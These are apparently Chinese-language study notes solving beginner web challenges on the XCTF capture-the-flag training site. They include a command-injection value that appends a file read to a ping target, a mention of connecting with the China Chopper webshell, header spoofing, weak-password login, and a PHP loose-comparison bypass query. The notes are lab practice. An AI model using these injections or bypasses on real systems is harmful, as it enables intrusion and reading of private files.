刷题 从简单的网站开始:
https://adworld.xctf.org.cn
curl http://111.198.29.45:31684
http://111.198.29.45:31684/?a=1 post b=2
http://111.198.29.45:31688/robots.txt
f1ag_1s_h3re.php
http://111.198.29.45:31689/index.php.bak
抓包:有个
Cookie: BL_D_PROV=undefined; BL_T_PROV=undefined; look-here=cookie.php
访问cookie.php 然后 查看返回的头
flag: xctf{da4630e034db74db11e85e31bd82e816}
查看元素
删除disabled
点击 可以获得flag
/**
 * Decoy "decoder" from the challenge page: its return value never depends on
 * the contents of the argument.
 *
 * The argument is split on commas, but only the hard-coded code list below is
 * ever turned into characters, so every string input yields the same text.
 *
 * @param {string} pass_enc - Comma-separated character codes supplied by the caller.
 * @returns {string} The text spelled by the hard-coded codes ("FAUX PASSWORD HAHA").
 * @throws {TypeError} When pass_enc is null/undefined or has no split method.
 */
function dechiffre(pass_enc) {
  // Fixed character codes; this list, not the argument, is what gets decoded.
  const decoyCodes = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65".split(',');

  // The argument is still split so that a non-string value fails here,
  // but the resulting pieces never reach the output.
  pass_enc.split(',');

  // The original assembled indices 0-5, then 6-16, then 17: the whole list in order.
  return decoyCodes.map((code) => String.fromCharCode(code)).join('');
}
// The escaped literal is "55,56,54,79,115,69,114,116,107,49,50", i.e. the character
// codes of "786OsErtk12". dechiffre() does not decode it (it returns its fixed decoy
// text), and the value of this whole expression is discarded.
String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"));
// Ask the visitor for a password; h is assigned without a declaration, so it becomes an implicit global.
h = window.prompt('Enter password');
// Shows dechiffre's result for the typed value; that result does not vary with the input.
alert( dechiffre(h) );
786OsErtk12
直接在python中
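# Hex-escaped form of the comma-separated character codes copied from the page script.
a = '\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30'
b = ''
# Iterate over the split pieces rather than the raw string: looping over `a`
# itself walks single characters and int(',') raises ValueError.
for i in a.split(','):
    # Each piece is a decimal character code.
    b = b + chr(int(i))
# Single-argument print() produces the same output on Python 2 and Python 3.
print(b)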
GET / HTTP/1.1
Host: 111.198.29.45:31727
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
X-Forwarded-For: 123.123.123.123
Referer: https://www.google.com
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
username=admin&password=123456
直接菜刀链接
target=127.0.0.1;tail /home/flag.txt
linux读文件命令:
cat, tac, more,less,head,tail,nl,od
弱类型比较
<?php
// Prints this file's own source in the response, so the checks below are visible to every visitor.
show_source(__FILE__);
// Presumably defines $flag1 and $flag2, which are not set anywhere in this file -- confirm.
include("config.php");
// Both values come straight from the query string; @ suppresses the diagnostic when a parameter is absent.
$a=@$_GET['a'];
$b=@$_GET['b'];
// Loose comparison: $a must compare equal to 0 and also be truthy. On PHP versions before 8 a
// non-numeric string is converted to 0 for ==, so such a string satisfies both conditions.
// A strict comparison (===) on a validated, explicitly cast value closes this gap.
if($a==0 and $a){
echo $flag1;
}
// Stops the script when $b is a number or a fully numeric string.
if(is_numeric($b)){
exit();
}
// Only a non-numeric $b reaches this point, yet > still compares it loosely against 1234:
// a string with leading digits followed by other characters is not stopped by the is_numeric()
// branch above and can still compare greater. Validate and cast once, then compare the cast value.
if($b>1234){
echo $flag2;
}
?>
http://111.198.29.45:31755/?a=False&b=1235aaa